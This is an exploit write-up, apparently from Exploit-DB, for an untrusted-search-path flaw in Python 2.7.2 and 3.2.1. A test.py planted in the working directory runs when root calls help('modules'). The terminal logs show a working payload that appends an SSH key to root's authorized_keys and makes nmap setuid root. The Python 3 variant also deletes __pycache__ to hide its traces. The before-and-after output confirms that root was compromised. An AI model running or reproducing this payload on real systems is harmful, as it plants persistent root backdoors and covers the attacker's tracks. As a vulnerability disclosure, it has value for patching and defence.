# Exploit Title: Python untrusted search path/code execution vulnerability
# Date: 7.6.12
# Exploit Author: rogueclown
# Vendor Homepage: http://www.python.org
# Software Link: http://www.python.org/getit/releases/
# Version: python 2.7.2 and python 3.2.1
# Tested on: linux (my test machine was OpenSUSE 12.1)
#
# This is an expansion on www.exploit-db.com/exploits/19523/ -- a big thanks,
# and the lion's share of the credit, to ShadowHatesYou (Shadow@SquatThis.net).
# They found the vulnerability; i just found a more generalized application
# of it.
# 
# Basically, i found that it's not just python-wrapper that executes a test.py
# script within the current working directory when help('modules') is run --
# python itself does that.  In python 2, it works just as ShadowHatesYou showed
# it in his python-wrapper exploit.
#
# This still works in python 3, but you have to do a bit more to cover your
# tracks.  In the working directory, python 3 drops a __pycache__ directory 
# with a .pyc file inside it.  Most of the bytecode in there is not human
# readable, but it displays the shell command called by the script in 
# plaintext, making it pretty obvious that something funny happened.  However,
# you can get around this by making sure that your test.py script removes the
# __pycache__ directory from the working directory. 
#
# rogueclown
# rogueclown@rogueclown.net
# 7.6.12

############
# PYTHON 2 #
############

adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
-rw-r--r-- 1 adalia users 144 Jul  4 15:47 test.py
adalia@bukkit:~/security/pythonwrapper> cat test.py
#!/usr/bin/python

import os

os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap")
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.4M Oct 29  2011 /usr/bin/nmap
adalia@bukkit:~/security/pythonwrapper> su
Password: 
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
bukkit:/home/adalia/security/pythonwrapper # python
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')

Please wait a moment while I gather a list of all available modules...


/usr/lib64/python2.7/site-packages/gobject/constants.py:24: Warning: g_boxed_type_register_static: assertion `g_type_from_name (name) == 0' failed
  import gobject._gobject
/usr/lib64/python2.7/site-packages/twisted/words/im/__init__.py:8: UserWarning: twisted.im will be undergoing a rewrite at some point in the future.
  warnings.warn("twisted.im will be undergoing a rewrite at some point in the future.")
** Message: pygobject_register_sinkfunc is deprecated (GstObject)
Alacarte            abc                 gtkunixprint        readline
BaseHTTPServer      aifc                gzip                repr
Bastion             antigravity         hashlib             resource
BeautifulSoup       anydbm              heapq               rexec
BeautifulSoupTests  argparse            hmac                rfc822
CDROM               array               hotshot             rlcompleter
CGIHTTPServer       ast                 hpmudext            robotparser
ConfigParser        asynchat            htmlentitydefs      rpm
Cookie              asyncore            htmllib             runpy
Crypto              atexit              httplib             satsolver
DLFCN               atk                 httplib2            scanext
DocXMLRPCServer     atom                ieee1284            sched
HTMLParser          audiodev            ihooks              scout
IN                  base64              imaplib             select
MimeWriter          bdb                 imghdr              serial
OpenSSL             beaker              imp                 sets
PAM                 binascii            importlib           setuptools
PyQt4               binhex              imputil             sgmllib
Queue               bisect              inspect             sha
SimpleHTTPServer    bsddb               io                  shelve
SimpleXMLRPCServer  butterfly           itertools           shlex
SocketServer        bz2                 json                shutil
StringIO            cPickle             keyword             signal
TYPES               cProfile            lib2to3             simplejson
UserDict            cStringIO           libproxy            sip
UserList            cairo               libvboxjxpcom       site
UserString          calendar            libxml2             smbc
VBoxAuth            cgi                 libxml2mod          smtpd
VBoxAuthSimple      cgitb               linecache           smtplib
VBoxDD              chunk               linuxaudiodev       sndhdr
VBoxDD2             cmath               locale              socket
VBoxDDU             cmd                 logging             spwd
VBoxDbg             code                louie               sqlite3
VBoxGuestControlSvc codecs              macpath             sre
VBoxGuestPropSvc    codeop              macurl2path         sre_compile
VBoxHeadless        coherence           mad                 sre_constants
VBoxKeyboard        collections         mailbox             sre_parse
VBoxNetDHCP         colorsys            mailcap             ssl
VBoxOGLhostcrutil   commands            mako                stat
VBoxOGLhosterrorspu compileall          markupbase          statvfs
VBoxOGLrenderspu    compiler            markupsafe          string
VBoxPython          contextlib          marshal             stringold
VBoxPython2_7       cookielib           math                stringprep
VBoxREM             copy                md5                 strop
VBoxRT              copy_reg            mhlib               struct
VBoxSDL             crypt               mimetools           subprocess
VBoxSharedClipboard csv                 mimetypes           sunau
VBoxSharedCrOpenGL  ctypes              mimify              sunaudio
VBoxSharedFolders   cups                mmap                symbol
VBoxVMM             cupsext             modulefinder        symtable
VBoxXPCOM           cupshelpers         multifile           sys
VBoxXPCOMC          curl                multiprocessing     sysconfig
VirtualBox          datetime            mutagen             syslog
Xlib                dbhash              mutex               tabnanny
_LWPCookieJar       dbus                mygpoclient         tarfile
_MozillaCookieJar   dbus_bindings       netrc               telepathy
__builtin__         decimal             new                 telnetlib
__future__          difflib             nis                 tempfile
_abcoll             dircache            nntplib             termios
_ast                dis                 ntpath              textwrap
_bisect             distutils           nturl2path          this
_bsddb              doctest             numbers             thread
_codecs             drv_libxml2         numpy               threading
_codecs_cn          dsextras            opcode              time
_codecs_hk          dumbdbm             operator            timeit
_codecs_iso2022     dummy_thread        optparse            toaiff
_codecs_jp          dummy_threading     os                  token
_codecs_kr          easy_install        os2emxpath          tokenize
_codecs_tw          email               ossaudiodev         trace
_collections        encodings           packagekit          traceback
_csv                errno               pango               tty
_ctypes             exceptions          pangocairo          twisted
_ctypes_test        eyeD3               papyon              types
_dbus_bindings      fcntl               parser              unicodedata
_dbus_glib_bindings feedparser          pcardext            unittest
_elementtree        filecmp             pdb                 uno
_functools          fileinput           pickle              unohelper
_hashlib            fnmatch             pickletools         urlgrabber
_heapq              formatter           pipes               urllib
_hotshot            fpformat            pkg_resources       urllib2
_io                 fractions           pkgutil             urlparse
_json               ftplib              platform            user
_locale             functools           plistlib            uu
_lsprof             future_builtins     popen2              uuid
_md5                gc                  poplib              vboxapi
_multibytecodec     gdata               posix               vboxshell
_multiprocessing    genericpath         posixfile           volkeys
_pyio               getopt              posixpath           warnings
_random             getpass             pprint              wave
_satsolver          gettext             profile             weakref
_sha                gi                  pstats              webbrowser
_sha256             gio                 pty                 whichdb
_sha512             glib                pwd                 wsgiref
_socket             glob                py_compile          xdg
_sqlite3            gmenu               pyclbr              xdrlib
_sre                gnome_sudoku        pycurl              xml
_ssl                gnomekeyring        pydoc               xmllib
_strptime           gobject             pydoc_data          xmlrpclib
_struct             gpod                pyexpat             xxsubtype
_symtable           gpodder             pygst               zeitgeist
_testcapi           grp                 pygtk               zipfile
_threading_local    gst                 pynotify            zipimport
_warnings           gstoption           quopri              zlib
_weakref            gtk                 random              zope
_weakrefset         gtktrayicon         re                  

Enter any module name to get more help.  Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".

>>> exit()
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.4M Oct 29  2011 /usr/bin/nmap
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
ssh-rsa rogueclown washere
bukkit:/home/adalia/security/pythonwrapper # 


############
# PYTHON 3 #
############

adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
-rw-r--r-- 1 adalia users 169 Jul  4 15:51 test.py
adalia@bukkit:~/security/pythonwrapper> cat test.py
#!/usr/bin/python

import os

os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap; /bin/rm -rf __pycache__")
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.4M Oct 29  2011 /usr/bin/nmap
adalia@bukkit:~/security/pythonwrapper> su
Password: 
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
bukkit:/home/adalia/security/pythonwrapper # python3
Python 3.2.1 (default, Jul 18 2011, 16:24:40) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')

Please wait a moment while I gather a list of all available modules...


CDROM               binascii            inspect             shelve
DLFCN               binhex              io                  shlex
IN                  bisect              itertools           shutil
TYPES               builtins            json                signal
__future__          bz2                 keyword             site
_abcoll             cProfile            linecache           smtpd
_ast                calendar            locale              smtplib
_bisect             cgi                 logging             sndhdr
_codecs             cgitb               macpath             socket
_codecs_cn          chunk               macurl2path         socketserver
_codecs_hk          cmath               mailbox             spwd
_codecs_iso2022     cmd                 mailcap             sqlite3
_codecs_jp          code                marshal             sre_compile
_codecs_kr          codecs              math                sre_constants
_codecs_tw          codeop              mimetypes           sre_parse
_collections        collections         mmap                ssl
_compat_pickle      colorsys            modulefinder        stat
_csv                compileall          multiprocessing     string
_ctypes             concurrent          netrc               stringprep
_datetime           configparser        nis                 struct
_dummy_thread       contextlib          nntplib             subprocess
_elementtree        copy                ntpath              sunau
_functools          copyreg             nturl2path          symbol
_hashlib            crypt               numbers             symtable
_heapq              csv                 opcode              sys
_io                 ctypes              operator            sysconfig
_json               datetime            optparse            syslog
_locale             decimal             os                  tabnanny
_lsprof             difflib             os2emxpath          tarfile
_markupbase         dis                 ossaudiodev         telnetlib
_multibytecodec     distutils           parser              tempfile
_multiprocessing    doctest             pdb                 termios
_pickle             dummy_threading     pickle              textwrap
_posixsubprocess    email               pickletools         this
_pyio               encodings           pipes               threading
_random             errno               pkgutil             time
_socket             fcntl               platform            timeit
_sqlite3            filecmp             plistlib            token
_sre                fileinput           poplib              tokenize
_ssl                fnmatch             posix               trace
_string             formatter           posixpath           traceback
_strptime           fractions           pprint              tty
_struct             ftplib              profile             turtle
_symtable           functools           pstats              types
_thread             gc                  pty                 unicodedata
_threading_local    genericpath         pwd                 unittest
_warnings           getopt              py_compile          urllib
_weakref            getpass             pyclbr              uu
_weakrefset         gettext             pydoc               uuid
abc                 glob                pydoc_data          warnings
aifc                grp                 queue               wave
antigravity         gzip                quopri              weakref
argparse            hashlib             random              webbrowser
array               heapq               re                  wsgiref
ast                 hmac                readline            xdrlib
asynchat            html                reprlib             xxlimited
asyncore            http                resource            xxsubtype
atexit              imaplib             rlcompleter         zipfile
audioop             imghdr              runpy               zipimport
base64              imp                 sched               zlib
bdb                 importlib           select              

Enter any module name to get more help.  Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".

>>> exit()
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.4M Oct 29  2011 /usr/bin/nmap
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
ssh-rsa rogueclown washere
bukkit:/home/adalia/security/pythonwrapper # ls __pycache__
ls: cannot access __pycache__: No such file or directory
bukkit:/home/adalia/security/pythonwrapper #